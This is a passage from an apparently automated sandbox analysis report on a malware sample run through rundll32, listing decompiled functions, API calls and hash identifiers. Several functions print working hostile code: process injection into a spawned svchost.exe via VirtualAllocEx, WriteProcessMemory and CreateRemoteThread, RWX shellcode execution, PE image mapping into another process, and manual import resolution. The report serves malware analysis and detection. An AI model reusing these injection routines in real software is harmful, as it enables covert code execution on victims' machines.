                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: lstrcpyn$Findlstrlen$7248CloseFileFirstHandleModule
                                            • String ID: GetLongPathNameA$\$kernel32.dll
                                            • API String ID: 1159896795-1565342463
                                            • Opcode ID: 6469e9139b0c1bed7657c93febbcad042d67a0a565f83e0d9b85ea9d6514cf4f
                                            • Instruction ID: 8c44691ffab61dd87489ac8817aaa2cd2c5d604620f9fe96f7d94913fa49cf5b
                                            • Opcode Fuzzy Hash: 6469e9139b0c1bed7657c93febbcad042d67a0a565f83e0d9b85ea9d6514cf4f
                                            • Instruction Fuzzy Hash: 04417C72D0025AABDB20FAA8CC89ADEB7EDEF59354F1401A1E949E7141EB309F418F54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001C3880, Relevance: 10.6, APIs: 7, Instructions: 103memorythreadinjectionCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 87%
                                            			E001C3880(void* _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				long _v36;

				if(_a12 == 0) {
					_v8 = VirtualAlloc(0, _a8, 0x3000, 0x40);
					if(_v8 == 0) {
						L14:
						return 0;
					}
					E001C1450(_v8, _a4, _a8);
					if(_a16 == 0) {
						_v28 = _v8;
						_v28();
						return 1;
					}
					_v24 = CreateThread(0, 0, E001C39E0, _v8, 0, 0);
					if(_v24 == 0) {
						goto L14;
					}
					CloseHandle(_v24);
					return 1;
				}
				if(E001C2C40( &_v16,  &_v32) != 0) {
					_v12 = VirtualAllocEx(_v16, 0, _a8, 0x3000, 0x40);
					if(_v12 == 0 || WriteProcessMemory(_v16, _v12, _a4, _a8, 0) == 0) {
						L7:
						goto L14;
					} else {
						_v20 = CreateRemoteThread(_v16, 0, 0, _v12, 0, 0,  &_v36);
						if(_v20 == 0) {
							goto L7;
						}
						CloseHandle(_v20);
						return 1;
					}
				}
				return 0;
			}











                                            0x001c388a
                                            0x001c3930
                                            0x001c3937
                                            0x001c3996
                                            0x00000000
                                            0x001c3996
                                            0x001c3945
                                            0x001c3951
                                            0x001c3989
                                            0x001c398c
                                            0x00000000
                                            0x001c398f
                                            0x001c396a
                                            0x001c3971
                                            0x00000000
                                            0x001c3984
                                            0x001c3977
                                            0x00000000
                                            0x001c397d
                                            0x001c38a2
                                            0x001c38c2
                                            0x001c38c9
                                            0x001c391b
                                            0x00000000
                                            0x001c38e7
                                            0x001c3901
                                            0x001c3908
                                            0x00000000
                                            0x00000000
                                            0x001c390e
                                            0x00000000
                                            0x001c3914
                                            0x001c38c9
                                            0x00000000

                                            APIs
                                            • VirtualAllocEx.KERNEL32(00500000,00000000,00500000,00003000,00000040,?,?,?,?,?,001C1FB7), ref: 001C38BC
                                            • WriteProcessMemory.KERNEL32(00500000,00000000,00000000,00500000,00000000,?,?,?,?,?,001C1FB7), ref: 001C38DD
                                            • CreateRemoteThread.KERNEL32(00500000,00000000,00000000,00000000,00000000,00000000,?), ref: 001C38FB
                                            • CloseHandle.KERNEL32(00000000), ref: 001C390E
                                            • VirtualAlloc.KERNEL32(00000000,00500000,00003000,00000040,?,?,?,001C1FB7), ref: 001C392A
                                            • CreateThread.KERNEL32(00000000,00000000,001C39E0,00000000,00000000,00000000), ref: 001C3964
                                            • CloseHandle.KERNEL32(00000000), ref: 001C3977
                                              • Part of subcall function 001C2C40: GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 001C2C71
                                              • Part of subcall function 001C2C40: lstrcatA.KERNEL32(?,\System32\svchost.exe), ref: 001C2C83
                                              • Part of subcall function 001C2C40: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000424,00000000,00000000,00000044,?), ref: 001C2CA9
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Create$AllocCloseHandleProcessThreadVirtual$EnvironmentMemoryRemoteVariableWritelstrcat
                                            • String ID:
                                            • API String ID: 2742758278-0
                                            • Opcode ID: 43c1543a0bbdca5a34f4da0b318a2447d76e9f1c9797deaf4808f2782165e1ec
                                            • Instruction ID: 6539c165327b1d4277637ec423453e6b6fe0be788b5a9450cd9376c4db4a151e
                                            • Opcode Fuzzy Hash: 43c1543a0bbdca5a34f4da0b318a2447d76e9f1c9797deaf4808f2782165e1ec
                                            • Instruction Fuzzy Hash: B3315875A44208FBEB14CFA4CC59FAE77B8AB58704F10851CF619AA280D3B0DB80CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001C3270, Relevance: 6.1, APIs: 4, Instructions: 113memoryinjectionCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 88%
                                            			E001C3270(void* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				void* _t57;
				void* _t59;
				void* _t92;
				void* _t93;

				_t3 = _a8 + 0x3c; // 0xf445c7f8
				_v24 = _a8 +  *_t3;
				_v16 =  *((intOrPtr*)(_v24 + 0x34));
				_v20 =  *((intOrPtr*)(_v24 + 0x50));
				_v12 = 0;
				_v8 = 0;
				_v28 = 0;
				while(1) {
					_v8 = VirtualAllocEx(_a4, _v16, _v20, 0x3000, 0x40);
					if(_v8 == 0) {
						_v8 = VirtualAllocEx(_a4, 0, _v20, 0x3000, 0x40);
						_v16 = _v8;
					}
					if(_v8 == 0) {
						break;
					}
					_t57 = E001C1390(_v20);
					_t93 = _t92 + 4;
					_v12 = _t57;
					if(_v12 != 0) {
						_t59 = E001C3A00(_a8, _a12, _v12, _v16);
						_t92 = _t93 + 0x10;
						if(_t59 == 0) {
						} else {
							if(_a16 != 0) {
								 *_a16 = _v16;
							}
							if(_a20 != 0) {
								 *_a20 = _v16 +  *((intOrPtr*)(_v24 + 0x28));
							}
							if(WriteProcessMemory(_a4, _v8, _v12, _v20, 0) != 0) {
								_v28 = 1;
								if(0 != 0) {
									continue;
								}
							} else {
							}
						}
					} else {
					}
					L17:
					if(_v12 != 0) {
						E001C13D0(_v12);
					}
					if(_v8 != 0 && _v28 == 0) {
						VirtualFreeEx(_a4, _v8, 0, 0x8000);
					}
					return _v28;
				}
				goto L17;
			}













                                            0x001c327c
                                            0x001c327f
                                            0x001c3288
                                            0x001c3291
                                            0x001c3294
                                            0x001c329b
                                            0x001c32a2
                                            0x001c32a9
                                            0x001c32c2
                                            0x001c32c9
                                            0x001c32e2
                                            0x001c32e8
                                            0x001c32e8
                                            0x001c32ef
                                            0x00000000
                                            0x00000000
                                            0x001c32fa
                                            0x001c32ff
                                            0x001c3302
                                            0x001c3309
                                            0x001c331d
                                            0x001c3322
                                            0x001c3327
                                            0x001c3329
                                            0x001c332d
                                            0x001c3335
                                            0x001c3335
                                            0x001c333b
                                            0x001c3349
                                            0x001c3349
                                            0x001c3369
                                            0x001c336d
                                            0x001c3376
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x001c336b
                                            0x001c3369
                                            0x00000000
                                            0x001c330b
                                            0x001c337c
                                            0x001c3380
                                            0x001c3386
                                            0x001c338b
                                            0x001c3392
                                            0x001c33a9
                                            0x001c33a9
                                            0x001c33b5
                                            0x001c33b5
                                            0x00000000

                                            APIs
                                            • VirtualAllocEx.KERNEL32(00000000,001C1ECF,FFFFFFFF,00003000,00000040), ref: 001C32BC
                                            • VirtualAllocEx.KERNEL32(00000000,00000000,FFFFFFFF,00003000,00000040), ref: 001C32DC
                                              • Part of subcall function 001C1390: GetProcessHeap.KERNEL32(?,001C1886,00100000), ref: 001C139C
                                              • Part of subcall function 001C1390: RtlAllocateHeap.NTDLL(00390000,00000000,001C1886,?,001C1886,00100000), ref: 001C13BD
                                            • WriteProcessMemory.KERNEL32(00000000,00000000,00000000,FFFFFFFF,00000000), ref: 001C3361
                                            • VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000), ref: 001C33A9
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Virtual$AllocHeapProcess$AllocateFreeMemoryWrite
                                            • String ID:
                                            • API String ID: 2713107948-0
                                            • Opcode ID: ddd4df55629f3073fe6d2b8d3f95488576472eae4c15ac5b1764e5f1d1aa83d7
                                            • Instruction ID: 45b3f62a40bb877f0f4364d6c79eaaf5e40cf1ed5e94e1bc796ee10232f78915
                                            • Opcode Fuzzy Hash: ddd4df55629f3073fe6d2b8d3f95488576472eae4c15ac5b1764e5f1d1aa83d7
                                            • Instruction Fuzzy Hash: CF41F9B5A00209EFDB14DF94C895FAEBBB5BB58304F20815CE915A7280D774EB80CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001C3580, Relevance: 6.1, APIs: 4, Instructions: 105libraryloaderCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E001C3580(intOrPtr _a4) {
				intOrPtr* _v8;
				struct HINSTANCE__* _v12;
				void* _v16;
				signed int* _v20;
				_Unknown_base(*)()* _v24;
				CHAR* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr* _v40;
				intOrPtr _v44;
				intOrPtr _v48;

				_v32 = _a4;
				_v36 = _a4 +  *((intOrPtr*)(_v32 + 0x3c));
				_v40 = _v36 + 0xbadc25;
				_v44 =  *_v40;
				_v8 = _a4 + _v44;
				while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
					_v28 = _a4 +  *((intOrPtr*)(_v8 + 0xc));
					_v12 = 0;
					_v12 = GetModuleHandleA(_v28);
					if(_v12 == 0) {
						_v12 = LoadLibraryA(_v28);
					}
					if(_v12 != 0) {
						_v16 = _a4 +  *((intOrPtr*)(_v8 + 0x10));
						_v20 = _a4 +  *_v8;
						if( *_v8 == 0) {
							_v20 = _v16;
						}
						while( *_v16 != 0) {
							_v48 = _a4 +  *_v20;
							_v24 = 0;
							if(( *_v20 & 0x80000000) == 0) {
								_v24 = GetProcAddress(_v12, _v48 + 2);
							} else {
								_v24 = GetProcAddress(_v12,  *_v20 & 0x0000ffff);
							}
							if( *_v16 != _v24) {
								 *_v16 = _v24;
							}
							_v16 = _v16 + 4;
							_v20 =  &(_v20[1]);
						}
						_v8 = _v8 + 0x14;
						continue;
					} else {
						return 0;
					}
				}
				return 1;
			}














                                            0x001c3589
                                            0x001c3595
                                            0x001c35a7
                                            0x001c35af
                                            0x001c35b8
                                            0x001c35bb
                                            0x001c35d1
                                            0x001c35d4
                                            0x001c35e5
                                            0x001c35ec
                                            0x001c35f8
                                            0x001c35f8
                                            0x001c35ff
                                            0x001c3611
                                            0x001c361c
                                            0x001c3625
                                            0x001c362a
                                            0x001c362a
                                            0x001c362d
                                            0x001c363d
                                            0x001c3640
                                            0x001c3651
                                            0x001c367f
                                            0x001c3653
                                            0x001c3669
                                            0x001c3669
                                            0x001c368a
                                            0x001c3692
                                            0x001c3692
                                            0x001c369a
                                            0x001c36a3
                                            0x001c36a3
                                            0x001c36ae
                                            0x00000000
                                            0x001c3601
                                            0x00000000
                                            0x001c3601
                                            0x001c35ff
                                            0x00000000

                                            APIs
                                            • GetModuleHandleA.KERNEL32(?), ref: 001C35DF
                                            • LoadLibraryA.KERNEL32(?), ref: 001C35F2
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 001C3663
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 001C3679
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$HandleLibraryLoadModule
                                            • String ID:
                                            • API String ID: 384173800-0
                                            • Opcode ID: 7aa2e56446c14f1a9eb1253e94b2b65db92ee16aecac30b411ff8bb10b9bff3e
                                            • Instruction ID: 481fd84cdc8b4d2cf18a692cb83ca927e9cc75eb9a4d89fb626e7e4ffa821652
                                            • Opcode Fuzzy Hash: 7aa2e56446c14f1a9eb1253e94b2b65db92ee16aecac30b411ff8bb10b9bff3e
                                            • Instruction Fuzzy Hash: ED418574E00219EFCB04CF98C594BADBBB1FF48304F248599D915AB355D734AA81CF94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001C2D98, Relevance: 4.5, APIs: 3, Instructions: 24encryptionCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 58%
                                            			E001C2D98() {
				void* _t17;

				if( *(_t17 - 4) != 0) {
					__imp__CryptDestroyHash( *(_t17 - 4));
					 *(_t17 - 4) = 0;
				}
				if( *(_t17 - 0xc) != 0) {
					CryptDestroyKey( *(_t17 - 0xc));
					 *(_t17 - 0xc) = 0;
				}
				if( *(_t17 - 8) != 0) {
					CryptReleaseContext( *(_t17 - 8), 0);
					 *(_t17 - 8) = 0;
				}
				return  *((intOrPtr*)(_t17 - 0x10));
			}




                                            0x001c2da4
                                            0x001c2daa
                                            0x001c2db0
                                            0x001c2db0
                                            0x001c2dbb
                                            0x001c2dc1
                                            0x001c2dc7
                                            0x001c2dc7
                                            0x001c2dd2
                                            0x001c2dda
                                            0x001c2de0
                                            0x001c2de0
                                            0x001c2ded

                                            APIs
                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 001C2DAA
                                            • CryptDestroyKey.ADVAPI32(00000000), ref: 001C2DC1
                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 001C2DDA
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Crypt$Destroy$ContextHashRelease
                                            • String ID:
                                            • API String ID: 3577760690-0
                                            • Opcode ID: ff9120fe552d41ecd68b76242c4ea52d2ede3d1b14341efcc400908728c3ec48
                                            • Instruction ID: 43df610eb92f586abccb3463cecde9d6d4d36afff5c0e0b023f089d6f38fc795
                                            • Opcode Fuzzy Hash: ff9120fe552d41ecd68b76242c4ea52d2ede3d1b14341efcc400908728c3ec48
                                            • Instruction Fuzzy Hash: CCF0A5B5944208EBEF24CFE4D95CFEDBBB4AB24305F108488E60667790C7798A94DF51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001C2D17, Relevance: 4.5, APIs: 3, Instructions: 24encryptionCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 58%
                                            			E001C2D17() {
				void* _t17;

				if( *(_t17 - 4) != 0) {
					__imp__CryptDestroyHash( *(_t17 - 4));
					 *(_t17 - 4) = 0;
				}
				if( *(_t17 - 0xc) != 0) {
					CryptDestroyKey( *(_t17 - 0xc));
					 *(_t17 - 0xc) = 0;
				}
				if( *(_t17 - 8) != 0) {
					CryptReleaseContext( *(_t17 - 8), 0);
					 *(_t17 - 8) = 0;
				}
				return  *((intOrPtr*)(_t17 - 0x10));
			}




                                            0x001c2da4
                                            0x001c2daa
                                            0x001c2db0
                                            0x001c2db0
                                            0x001c2dbb
                                            0x001c2dc1
                                            0x001c2dc7
                                            0x001c2dc7
                                            0x001c2dd2
                                            0x001c2dda
                                            0x001c2de0
                                            0x001c2de0
                                            0x001c2ded

                                            APIs
                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 001C2DAA
                                            • CryptDestroyKey.ADVAPI32(00000000), ref: 001C2DC1
                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 001C2DDA
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Crypt$Destroy$ContextHashRelease
                                            • String ID:
                                            • API String ID: 3577760690-0
                                            • Opcode ID: 9f977589229de4b6b405a3f1990b6dad0a2c6419759c5f7e3878db6b5eb648ae
                                            • Instruction ID: 43df610eb92f586abccb3463cecde9d6d4d36afff5c0e0b023f089d6f38fc795
                                            • Opcode Fuzzy Hash: 9f977589229de4b6b405a3f1990b6dad0a2c6419759c5f7e3878db6b5eb648ae
                                            • Instruction Fuzzy Hash: CCF0A5B5944208EBEF24CFE4D95CFEDBBB4AB24305F108488E60667790C7798A94DF51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001C2D55, Relevance: 4.5, APIs: 3, Instructions: 24encryptionCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 58%
                                            			E001C2D55() {
				void* _t17;

				if( *(_t17 - 4) != 0) {
					__imp__CryptDestroyHash( *(_t17 - 4));
					 *(_t17 - 4) = 0;
				}
				if( *(_t17 - 0xc) != 0) {
					CryptDestroyKey( *(_t17 - 0xc));
					 *(_t17 - 0xc) = 0;
				}
				if( *(_t17 - 8) != 0) {
					CryptReleaseContext( *(_t17 - 8), 0);
					 *(_t17 - 8) = 0;
				}
				return  *((intOrPtr*)(_t17 - 0x10));
			}




                                            0x001c2da4
                                            0x001c2daa
                                            0x001c2db0
                                            0x001c2db0
                                            0x001c2dbb
                                            0x001c2dc1
                                            0x001c2dc7
                                            0x001c2dc7
                                            0x001c2dd2
                                            0x001c2dda
                                            0x001c2de0
                                            0x001c2de0
                                            0x001c2ded

                                            APIs
                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 001C2DAA
                                            • CryptDestroyKey.ADVAPI32(00000000), ref: 001C2DC1
                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 001C2DDA
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Crypt$Destroy$ContextHashRelease
                                            • String ID:
                                            • API String ID: 3577760690-0
                                            • Opcode ID: b9cef658cc9a76aba9b45eb3e7ef16ef8b133b95413b36529222cf6954162521
                                            • Instruction ID: 43df610eb92f586abccb3463cecde9d6d4d36afff5c0e0b023f089d6f38fc795
                                            • Opcode Fuzzy Hash: b9cef658cc9a76aba9b45eb3e7ef16ef8b133b95413b36529222cf6954162521
                                            • Instruction Fuzzy Hash: CCF0A5B5944208EBEF24CFE4D95CFEDBBB4AB24305F108488E60667790C7798A94DF51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001C2D78, Relevance: 4.5, APIs: 3, Instructions: 24encryptionCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 58%
                                            			E001C2D78() {
				void* _t17;

				if( *(_t17 - 4) != 0) {
					__imp__CryptDestroyHash( *(_t17 - 4));
					 *(_t17 - 4) = 0;
				}
				if( *(_t17 - 0xc) != 0) {
					CryptDestroyKey( *(_t17 - 0xc));
					 *(_t17 - 0xc) = 0;
				}
				if( *(_t17 - 8) != 0) {
					CryptReleaseContext( *(_t17 - 8), 0);
					 *(_t17 - 8) = 0;
				}
				return  *((intOrPtr*)(_t17 - 0x10));
			}




                                            0x001c2da4
                                            0x001c2daa
                                            0x001c2db0
                                            0x001c2db0
                                            0x001c2dbb
                                            0x001c2dc1
                                            0x001c2dc7
                                            0x001c2dc7
                                            0x001c2dd2
                                            0x001c2dda
                                            0x001c2de0
                                            0x001c2de0
                                            0x001c2ded

                                            APIs
                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 001C2DAA
                                            • CryptDestroyKey.ADVAPI32(00000000), ref: 001C2DC1
                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 001C2DDA
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Crypt$Destroy$ContextHashRelease
                                            • String ID:
                                            • API String ID: 3577760690-0
                                            • Opcode ID: 768a2efe29179f96dd2c15f3f714223f4e04de0ad962a490e514dfea00a22aac
                                            • Instruction ID: 43df610eb92f586abccb3463cecde9d6d4d36afff5c0e0b023f089d6f38fc795
                                            • Opcode Fuzzy Hash: 768a2efe29179f96dd2c15f3f714223f4e04de0ad962a490e514dfea00a22aac
                                            • Instruction Fuzzy Hash: CCF0A5B5944208EBEF24CFE4D95CFEDBBB4AB24305F108488E60667790C7798A94DF51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0018A9A0, Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 46%
                                            			E0018A9A0(int __eax, void* __ebx, void* __eflags) {
				char _v11;
				char _v16;
				intOrPtr _t28;
				void* _t31;
				void* _t33;

				_t33 = __eflags;
				_v16 = 0;
				_push(_t31);
				_push(0x18aa04);
				_push( *[fs:edx]);
				 *[fs:edx] = _t31 + 0xfffffff4;
				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
				E00183BF0( &_v16, 7,  &_v11);
				_push(_v16);
				E00186AC0(7, GetACP(), _t33);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E0018AA0B);
				return E00183980( &_v16);
			}








                                            0x0018a9a0
                                            0x0018a9a9
                                            0x0018a9ae
                                            0x0018a9af
                                            0x0018a9b4
                                            0x0018a9b7
                                            0x0018a9c6
                                            0x0018a9d6
                                            0x0018a9de
                                            0x0018a9e7
                                            0x0018a9f0
                                            0x0018a9f3
                                            0x0018a9f6
                                            0x0018aa03

                                            APIs
                                            • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0018AA04), ref: 0018A9C6
                                            • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0018AA04), ref: 0018A9DF
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: InfoLocale
                                            • String ID:
                                            • API String ID: 2299586839-0
                                            • Opcode ID: 8a0f145cb963d217eaff7a73a0b5f9e12f7a49f92de52e34c7238e0e5b79e31f
                                            • Instruction ID: f50fb5c2a140fd6f704e199e14ef98e6d6143caebfc39f66eb4fca77feceab1d
                                            • Opcode Fuzzy Hash: 8a0f145cb963d217eaff7a73a0b5f9e12f7a49f92de52e34c7238e0e5b79e31f
                                            • Instruction Fuzzy Hash: FBF09071E04708BFEB04FBA1C85299EB3ABEBC8B14F90C865B510D7681EB7967048F50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00186E8A, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00186E8A(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				CHAR* _t25;
				int _t26;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr* _t39;
				intOrPtr* _t40;
				intOrPtr _t48;
				intOrPtr _t50;

				_t25 = _a4;
				if(_t25 == 0) {
					_t25 = 0;
				}
				_t26 = GetDiskFreeSpaceA(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
				_v28 = _v8 * _v12;
				_v24 = 0;
				_t48 = _v24;
				_t31 = E00184580(_v28, _t48, _v16, 0);
				_t39 = _a8;
				 *_t39 = _t31;
				 *((intOrPtr*)(_t39 + 4)) = _t48;
				_t50 = _v24;
				_t34 = E00184580(_v28, _t50, _v20, 0);
				_t40 = _a12;
				 *_t40 = _t34;
				 *((intOrPtr*)(_t40 + 4)) = _t50;
				return _t26;
			}

















                                            0x00186e93
                                            0x00186e98
                                            0x00186e9a
                                            0x00186e9a
                                            0x00186ead
                                            0x00186ebc
                                            0x00186ebf
                                            0x00186ecc
                                            0x00186ecf
                                            0x00186ed4
                                            0x00186ed7
                                            0x00186ed9
                                            0x00186ee6
                                            0x00186ee9
                                            0x00186eee
                                            0x00186ef1
                                            0x00186ef3
                                            0x00186efc

                                            APIs
                                            • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 00186EAD
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: DiskFreeSpace
                                            • String ID:
                                            • API String ID: 1705453755-0
                                            • Opcode ID: b02226f70f1faef854ad1d2873c877cceed355fa1559f2fe83d1c1a34bbe3657
                                            • Instruction ID: 7ebe96205df1c1685f076f0b9bfd8f1f10e75a3b7385c65859e945e9ee0f68dd
                                            • Opcode Fuzzy Hash: b02226f70f1faef854ad1d2873c877cceed355fa1559f2fe83d1c1a34bbe3657
                                            • Instruction Fuzzy Hash: FE11CCB5A01209AFDB04DFA9C8819AFB7F9EFC8710B14C569E509E7254E6319E018BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001852EE, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 51%
                                            			E001852EE(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x185356);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E00183BF0( &_v20, 7,  &_v15);
				E001828D8(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E0018535D);
				return E00183980( &_v20);
			}








                                            0x001852f9
                                            0x001852fe
                                            0x001852ff
                                            0x00185304
                                            0x00185307
                                            0x00185316
                                            0x00185326
                                            0x00185331
                                            0x0018533c
                                            0x0018533c
                                            0x00185342
                                            0x00185345
                                            0x00185348
                                            0x00185355

                                            APIs
                                            • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00185356), ref: 00185316
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: InfoLocale
                                            • String ID:
                                            • API String ID: 2299586839-0
                                            • Opcode ID: 8b2b844bccb24670146370084169b074dbcf6b974fd3c4a463578f67c9a69e20
                                            • Instruction ID: 722a54c4382752da06b96997a0c09a12a52e68e3f2e1910a007b69f51460edb6
                                            • Opcode Fuzzy Hash: 8b2b844bccb24670146370084169b074dbcf6b974fd3c4a463578f67c9a69e20
                                            • Instruction Fuzzy Hash: 6FF0AF31A04609AFEB15EEA0CC42AAEB3BAFB85710F408875B51096180E7B42B048B90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001852F0, Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 51%
                                            			E001852F0(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x185356);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E00183BF0( &_v20, 7,  &_v15);
				E001828D8(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E0018535D);
				return E00183980( &_v20);
			}








                                            0x001852f9
                                            0x001852fe
                                            0x001852ff
                                            0x00185304
                                            0x00185307
                                            0x00185316
                                            0x00185326
                                            0x00185331
                                            0x0018533c
                                            0x0018533c
                                            0x00185342
                                            0x00185345
